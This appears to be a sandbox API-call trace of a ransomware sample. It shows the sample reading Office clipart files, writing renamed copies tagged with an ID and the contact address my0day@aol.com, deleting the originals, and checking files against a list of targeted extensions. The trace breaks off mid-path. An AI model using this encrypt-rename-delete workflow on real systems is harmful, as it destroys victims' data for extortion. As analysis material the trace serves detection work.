[0273.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.608] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.608] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.608] GetLastError () returned 0x0 [0273.608] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xe30, lpOverlapped=0x0) returned 1 [0273.610] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xe40, lpOverlapped=0x0) returned 1 [0273.611] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.611] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.611] SetEndOfFile (hFile=0x384) returned 1 [0273.611] CloseHandle (hObject=0x384) returned 1 [0273.611] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.611] SetEndOfFile (hFile=0x39c) returned 1 [0273.613] CloseHandle (hObject=0x39c) returned 1 [0273.613] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 1 [0273.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString=".doc") returned 4 [0273.614] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".docx") returned 5 [0273.614] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.614] lstrlenW (lpString=".pdf") returned 4 [0273.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".xls") returned 4 [0273.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.614] lstrlenW (lpString=".xlsx") returned 5 [0273.614] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.614] lstrlenW (lpString=".ppt") returned 4 [0273.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString=".zip") returned 4 [0273.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.614] lstrlenW (lpString=".rar") returned 4 [0273.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".bz2") returned 4 [0273.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".7z") returned 3 [0273.614] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString=".dbf") returned 4 [0273.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString=".1cd") returned 4 [0273.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString=".jpg") returned 4 [0273.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.614] lstrlenW (lpString=".doc") returned 4 [0273.614] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.614] lstrlenW (lpString=".docx") returned 5 [0273.615] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.615] lstrlenW (lpString=".pdf") returned 4 [0273.615] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.615] lstrlenW (lpString=".xls") returned 4 [0273.615] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.615] lstrlenW (lpString=".xlsx") returned 5 [0273.615] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.615] lstrlenW (lpString=".ppt") returned 4 [0273.615] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.615] lstrlenW (lpString=".zip") returned 4 [0273.615] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.615] lstrlenW (lpString=".rar") returned 4 [0273.615] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.615] lstrlenW (lpString=".bz2") returned 4 [0273.615] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.615] lstrlenW (lpString=".7z") returned 3 [0273.615] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.615] lstrlenW (lpString=".dbf") returned 4 [0273.615] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.615] lstrlenW (lpString=".1cd") returned 4 [0273.615] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0273.615] lstrlenW (lpString=".jpg") returned 4 [0273.615] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.615] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.615] lstrlenW (lpString="DD01143_.WMF") returned 12 [0273.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.616] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2140) returned 1 [0273.616] CloseHandle (hObject=0x39c) returned 1 [0273.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 0x20 [0273.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.616] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.616] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.616] GetLastError () returned 0x0 [0273.616] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x85c, lpOverlapped=0x0) returned 1 [0273.618] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x860, lpOverlapped=0x0) returned 1 [0273.619] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.619] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.619] SetEndOfFile (hFile=0x384) returned 1 [0273.619] CloseHandle (hObject=0x384) returned 1 [0273.619] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.619] SetEndOfFile (hFile=0x39c) returned 1 [0273.621] CloseHandle (hObject=0x39c) returned 1 [0273.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.622] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 1 [0273.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.622] lstrlenW (lpString=".doc") returned 4 [0273.622] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.622] lstrlenW (lpString=".docx") returned 5 [0273.622] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.622] lstrlenW (lpString=".pdf") returned 4 [0273.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".xls") returned 4 [0273.623] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.623] lstrlenW (lpString=".xlsx") returned 5 [0273.623] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.623] lstrlenW (lpString=".ppt") returned 4 [0273.623] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.623] lstrlenW (lpString=".zip") returned 4 [0273.623] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.623] lstrlenW (lpString=".rar") returned 4 [0273.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".bz2") returned 4 [0273.623] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".7z") returned 3 [0273.623] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.623] lstrlenW (lpString=".dbf") returned 4 [0273.623] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.623] lstrlenW (lpString=".1cd") returned 4 [0273.623] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.623] lstrlenW (lpString=".jpg") returned 4 [0273.623] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.623] lstrlenW (lpString=".doc") returned 4 [0273.623] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.623] lstrlenW (lpString=".docx") returned 5 [0273.624] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.624] lstrlenW (lpString=".pdf") returned 4 [0273.624] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString=".xls") returned 4 [0273.624] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.624] lstrlenW (lpString=".xlsx") returned 5 [0273.624] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.624] lstrlenW (lpString=".ppt") returned 4 [0273.624] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.624] lstrlenW (lpString=".zip") returned 4 [0273.624] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.624] lstrlenW (lpString=".rar") returned 4 [0273.624] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString=".bz2") returned 4 [0273.624] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString=".7z") returned 3 [0273.624] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.624] lstrlenW (lpString=".dbf") returned 4 [0273.624] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.624] lstrlenW (lpString=".1cd") returned 4 [0273.624] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0273.624] lstrlenW (lpString=".jpg") returned 4 [0273.624] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.624] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.624] lstrlenW (lpString="DD01145_.WMF") returned 12 [0273.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.625] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2780) returned 1 [0273.625] CloseHandle (hObject=0x39c) returned 1 [0273.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 0x20 [0273.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.625] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.625] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.625] GetLastError () returned 0x0 [0273.626] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xadc, lpOverlapped=0x0) returned 1 [0273.627] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xae0, lpOverlapped=0x0) returned 1 [0273.628] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.628] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.628] SetEndOfFile (hFile=0x384) returned 1 [0273.628] CloseHandle (hObject=0x384) returned 1 [0273.628] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.628] SetEndOfFile (hFile=0x39c) returned 1 [0273.630] CloseHandle (hObject=0x39c) returned 1 [0273.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf")) returned 1 [0273.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.631] lstrlenW (lpString=".doc") returned 4 [0273.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.631] lstrlenW (lpString=".docx") returned 5 [0273.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.631] lstrlenW (lpString=".pdf") returned 4 [0273.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.631] lstrlenW (lpString=".xls") returned 4 [0273.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.631] lstrlenW (lpString=".xlsx") returned 5 [0273.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.631] lstrlenW (lpString=".ppt") returned 4 [0273.631] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.631] lstrlenW (lpString=".zip") returned 4 [0273.631] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.631] lstrlenW (lpString=".rar") returned 4 [0273.631] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString=".bz2") returned 4 [0273.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString=".7z") returned 3 [0273.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.632] lstrlenW (lpString=".dbf") returned 4 [0273.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.632] lstrlenW (lpString=".1cd") returned 4 [0273.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.632] lstrlenW (lpString=".jpg") returned 4 [0273.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.632] lstrlenW (lpString=".doc") returned 4 [0273.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString=".docx") returned 5 [0273.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.632] lstrlenW (lpString=".pdf") returned 4 [0273.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString=".xls") returned 4 [0273.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.632] lstrlenW (lpString=".xlsx") returned 5 [0273.632] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.632] lstrlenW (lpString=".ppt") returned 4 [0273.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.632] lstrlenW (lpString=".zip") returned 4 [0273.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.632] lstrlenW (lpString=".rar") returned 4 [0273.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString=".bz2") returned 4 [0273.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.632] lstrlenW (lpString=".7z") returned 3 [0273.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.633] lstrlenW (lpString=".dbf") returned 4 [0273.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.633] lstrlenW (lpString=".1cd") returned 4 [0273.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 63 [0273.633] lstrlenW (lpString=".jpg") returned 4 [0273.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.633] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.633] lstrlenW (lpString="DD01146_.WMF") returned 12 [0273.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.633] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2796) returned 1 [0273.633] CloseHandle (hObject=0x39c) returned 1 [0273.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 0x20 [0273.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.634] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.634] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 